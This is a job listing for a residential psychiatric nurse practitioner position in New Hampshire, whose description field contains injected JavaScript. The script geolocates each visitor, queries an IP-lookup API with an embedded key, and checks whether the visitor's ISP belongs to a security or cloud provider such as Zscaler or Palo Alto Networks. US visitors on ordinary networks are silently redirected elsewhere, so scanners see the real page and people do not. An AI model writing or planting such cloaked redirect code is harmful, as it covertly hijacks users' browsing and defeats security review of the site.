Psychiatric Nurse Practitioner (PMHNP) – Residential Mental Health Treatment

Nashua, NH
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/2273eaa9a7a91e47/92c6e77ad547d39d87cf67d8a8df6ec73cb03f5135c6e3888e36ca09d4c03ea4/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

Join a dedicated mental health treatment team as a Psychiatric Nurse Practitioner (PMHNP) in Milton, NH, providing full-time, in-person care Monday–Friday with weekend on-call rotation.

You will

  • Conduct psychiatric assessments for new residents
  • Develop and manage individualized treatment and medication plans
  • Prescribe and monitor medications ensuring safe, evidence-based care
  • Collaborate with a multidisciplinary team for holistic support
  • Educate residents and families about diagnoses and treatments
  • Respond to emergencies and provide crisis stabilization
  • Maintain accurate documentation within the EHR system
  • Ideal candidates have a

  • Master’s in Nursing with PMHNP certification
  • Active NH Nurse Practitioner License and DEA (or in process)
  • At least 2 years of psychiatric experience, preferably with youth
  • Strong knowledge of trauma-informed care and co-occurring disorders
  • Benefits include

  • up to $140,000/year
  • medical, dental, vision insurance
  • 401(k) with 4% match
  • generous paid time off
  • continuing education support
  • a collaborative team environment

    Work in a mission-driven organization dedicated to helping adolescents and young adults find hope and healing while advancing your career. Relocation and commuting to Milton, NH are required.